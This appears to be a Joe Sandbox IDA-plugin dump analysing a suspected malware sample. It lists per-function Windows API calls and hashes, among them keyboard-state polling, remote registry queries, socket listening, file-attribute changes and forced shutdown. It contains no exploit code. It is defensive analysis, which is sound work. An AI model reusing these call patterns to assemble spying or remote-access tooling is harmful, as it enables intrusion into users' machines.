                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CDD161725483009EC310EBA4DC85EABB7ECAF98744F04591DF5C5E7291EB74D948CB62
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,760A8FB0,?,00000000), ref: 00ED9EB3
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00ED9EF1
                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00ED9F0B
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00ED9F23
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00ED9F2E
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00ED9F4A
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00ED9F9A
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00F27B88), ref: 00ED9FB8
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00ED9FC2
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00ED9FCF
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00ED9FDF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                      • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                      • Opcode ID: eaf55423d2cc8ba3d93f9acb5efc5efc74c5090b667018d587fa82e98fcaa27a
                                                                                                                                                                                                                                      • Instruction ID: 231a9ceb2830d88c8b4583de5b39f08c77ed5f13f863548ea2a1dbba1ad8efac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eaf55423d2cc8ba3d93f9acb5efc5efc74c5090b667018d587fa82e98fcaa27a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9631D03260521D6FDF20AFA4EC49AEEB7ADEF85324F005156E819F22A1DB30D985CA50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,760A8FB0,?,00000000), ref: 00EDA00E
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00EDA069
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00EDA074
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00EDA090
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EDA0E0
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00F27B88), ref: 00EDA0FE
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EDA108
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00EDA115
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00EDA125
                                                                                                                                                                                                                                        • Part of subcall function 00ECE1A4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00ECE1BF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                      • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                      • Opcode ID: 79174c5f46d2204883435583b55ca7122fdf0a9e42f1a1340686d35568cf1727
                                                                                                                                                                                                                                      • Instruction ID: eabdfa52bf3ecd80e2ff8cc310402a2417519690a5ca615ea7b9966d49917537
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79174c5f46d2204883435583b55ca7122fdf0a9e42f1a1340686d35568cf1727
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF31177210521D6ECF10ABA4DC09AEE77ADDF45324F145162E814F32E0DB70CE86DA52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00ED4590
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00ED45ED
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00ED460E
                                                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00ED461E
                                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00ED46A5
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00ED46B0
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00ED46BB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                                                                                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                                                                                                                                      • API String ID: 3827137101-3457252023
                                                                                                                                                                                                                                      • Opcode ID: 8286db44bcb8cc0f52eef9d56ef6be30801f8589baa960bd1052212ba8f168ce
                                                                                                                                                                                                                                      • Instruction ID: 70073dd609b2e9b4015f2863620996e5c693d78c049f42e4433f51aeb6e87ac0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8286db44bcb8cc0f52eef9d56ef6be30801f8589baa960bd1052212ba8f168ce
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F831BEB190420AABDB219BA1DC49FEF37BDEF89704F1050B6F619E21A0E770D645CB24
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EED1F1: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EEBF07,?,?), ref: 00EED20E
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EEC797
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00EEC802
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EEC826
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EEC885
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EEC940
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00EEC9AD
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00EECA42
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00EECA93
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00EECB3C
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EECBDB
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EECBE8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3218304859-0
                                                                                                                                                                                                                                      • Opcode ID: e4771e30515d0a570e11c97412d2c393e26864038130aac67e4713b2ca84bef6
                                                                                                                                                                                                                                      • Instruction ID: 85ec2c67b5528c1d5e6f9c10fcc943e67cd1d4ee218977228e69a1e85739ade9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4771e30515d0a570e11c97412d2c393e26864038130aac67e4713b2ca84bef6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC0295716042449FC714DF25C891E2ABBE5FF88318F18989DF84AEB2A2D731EC46CB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00ECA349
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00ECA3CA
                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00ECA3E5
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00ECA3FF
                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00ECA414
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00ECA42C
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 00ECA43E
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00ECA456
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 00ECA468
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00ECA480
                                                                                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00ECA492
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                                                                                      • Opcode ID: 7e96ec2ac8d5adbf3db2aa4a27aaff0680437ca9011ee336994e6112c2faa509
                                                                                                                                                                                                                                      • Instruction ID: 4dbc24a9957e0092152ebff6df1b45676a04c6ff3fc72c8f8d5c5dadcd40e6a7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e96ec2ac8d5adbf3db2aa4a27aaff0680437ca9011ee336994e6112c2faa509
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F14106205047CDADFF344BA48A18BB9BEA1BB1130CF0C906DC5D66A1C2DAD69DC9C763
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC1D4D: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC1D97
                                                                                                                                                                                                                                        • Part of subcall function 00EC1D4D: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC1DC4
                                                                                                                                                                                                                                        • Part of subcall function 00EC1D4D: GetLastError.KERNEL32 ref: 00EC1DD4
                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00ECF054
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                      • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                      • Opcode ID: bf1aa5e767b943a322c03258fb0593e3704f7c1371e63001bf2569bf64680438
                                                                                                                                                                                                                                      • Instruction ID: a81e583a8045eab7c85e84af1b42fcd79399f7e745335e3173ed1a18b04af44a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf1aa5e767b943a322c03258fb0593e3704f7c1371e63001bf2569bf64680438
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0101F232614310AFE72426B8AE87FBE779D9B08744F11553AFC02F20D3C9B29C06C1A0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00EE1ACF
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00EE1ADC
                                                                                                                                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00EE1B13
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00EE1B1E
                                                                                                                                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00EE1B4D
                                                                                                                                                                                                                                      • listen.WSOCK32(00000000,00000005), ref: 00EE1B5C
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00EE1B66
                                                                                                                                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00EE1B95
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 540024437-0
                                                                                                                                                                                                                                      • Opcode ID: d7d9e110e834c9cec364035de3ad673a60abcf7a14757e2bc3849f2db50770f4
                                                                                                                                                                                                                                      • Instruction ID: d1dc64d55880b91908c0a5fa6a602cfc7de6c401742437fd312f24223d918165
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7d9e110e834c9cec364035de3ad673a60abcf7a14757e2bc3849f2db50770f4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B41A130600184DFD714DF29C884B29BBE6AF86358F1891D8E856AF292D771ECC5CBE1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00EDA3C8
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00EDA4DB
                                                                                                                                                                                                                                        • Part of subcall function 00ED40C4: GetInputState.USER32 ref: 00ED411B
                                                                                                                                                                                                                                        • Part of subcall function 00ED40C4: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED41B6
                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00EDA3F8
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00EDA4C5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                      • API String ID: 1927845040-438819550
                                                                                                                                                                                                                                      • Opcode ID: 8a1abe51cbe7b8e79e7fcf2a01e30595cf2e80bdedb531fefaec06e44f9436c6
                                                                                                                                                                                                                                      • Instruction ID: aca5d88364df4c8d0ba74cf2aabdff58c42c9486fd1d0979eeaa89aae2f7191a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a1abe51cbe7b8e79e7fcf2a01e30595cf2e80bdedb531fefaec06e44f9436c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B418E7194420A9FCF10DFA4CC49AEEBBB4EF05314F145166E815B2291DB709F8ACF52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E79DA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E79DB2
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E79C4E
                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00E79D23
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00E79D36
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$LongProcWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3131106179-0
                                                                                                                                                                                                                                      • Opcode ID: 1f1d0fe460ec24ea8c704d71690ba2d52fcc1f37a9ae4c532ccd6c1894825da6
                                                                                                                                                                                                                                      • Instruction ID: 8c6c51bfd4eed861c17592cfc813c0496317401568e1ec0421a4b05fbff6d18d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f1d0fe460ec24ea8c704d71690ba2d52fcc1f37a9ae4c532ccd6c1894825da6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35A15C70108408BEEB29AA3D8C48EFB79DDDFC6354F24A109F546FAA97C6259D01E371
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EE38A7: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EE38D3
                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00EE20B6
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00EE20DD
                                                                                                                                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00EE2134
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00EE213F
                                                                                                                                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00EE216E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 99427753-0
                                                                                                                                                                                                                                      • Opcode ID: d061e916afbfc0fa28f2ac1fb4a0defe20b51bbcfed2a8f5102110b3e0296154
                                                                                                                                                                                                                                      • Instruction ID: e9287537b24fc267d678eeecceb56f967d3d50283f45d73df089cfa47dfeafe4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d061e916afbfc0fa28f2ac1fb4a0defe20b51bbcfed2a8f5102110b3e0296154
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8451E170A40204AFD710AF25D886F2A77E9AF44358F18848CFA49BF3C3D671AD41CBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
